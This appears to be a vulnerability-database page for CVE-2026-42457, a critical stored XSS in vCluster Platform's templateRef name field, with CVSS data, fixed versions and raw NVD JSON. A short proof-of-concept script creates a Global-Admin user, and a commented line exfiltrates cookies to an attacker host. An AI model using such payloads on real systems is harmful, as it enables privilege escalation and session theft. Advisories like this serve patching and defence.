CVE-2026-42457

Description

vCluster Platform provides a Kubernetes platform for managing virtual clusters, multi-tenancy, and cluster sharing. Prior to 4.4.3, 4.5.5, 4.6.2, 4.7.1, and 4.8.0, there is a Stored XSS attack vulnerability via the name field of a templateRef. This can lead to the execution of arbitrary external scripts within the platform's browser context. In the worst case, a malicious user could potentially create a new Global-Admin user, bypassing other security restrictions. The attacker needs the ability to create namespaces. This vulnerability is fixed in 4.4.3, 4.5.5, 4.6.2, 4.7.1, and 4.8.0.

CVSS Details

CVSS Score

9.0

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

vCluster Platform < 4.4.3

vCluster Platform < 4.5.5

vCluster Platform < 4.6.2

vCluster Platform < 4.7.1

vCluster Platform < 4.8.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- Proof of Concept for Stored XSS in templateRef name -->
<!-- Attacker creates a namespace/template with this payload in the name field -->
<script>
  // Attempt to escalate privileges by creating a Global-Admin user
  fetch('/api/v1/users', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ username: 'hacker', role: 'Global-Admin' })
  });
  
  // Alternatively, exfiltrate session cookies
  // new Image().src = 'http://attacker-server.com/steal?c=' + document.cookie;
</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42457
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42457
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42457/
[4] VulDB https://vuldb.com/cve/CVE-2026-42457
[5] https://github.com/loft-sh/loft/security/advisories/GHSA-x7cq-v3h6-426c

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42457", "sourceIdentifier": "[email protected]", "published": "2026-05-14T15:16:46.500", "lastModified": "2026-05-14T17:19:49.973", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "vCluster Platform provides a Kubernetes platform for managing virtual clusters, multi-tenancy, and cluster sharing. Prior to 4.4.3, 4.5.5, 4.6.2, 4.7.1, and 4.8.0, there is a Stored XSS attack vulnerability via the name field of a templateRef. This can lead to the execution of arbitrary external scripts within the platform's browser context. In the worst case, a malicious user could potentially create a new Global-Admin user, bypassing other security restrictions. The attacker needs the ability to create namespaces. This vulnerability is fixed in 4.4.3, 4.5.5, 4.6.2, 4.7.1, and 4.8.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/loft-sh/loft/security/advisories/GHSA-x7cq-v3h6-426c", "source": "[email protected]"}]}}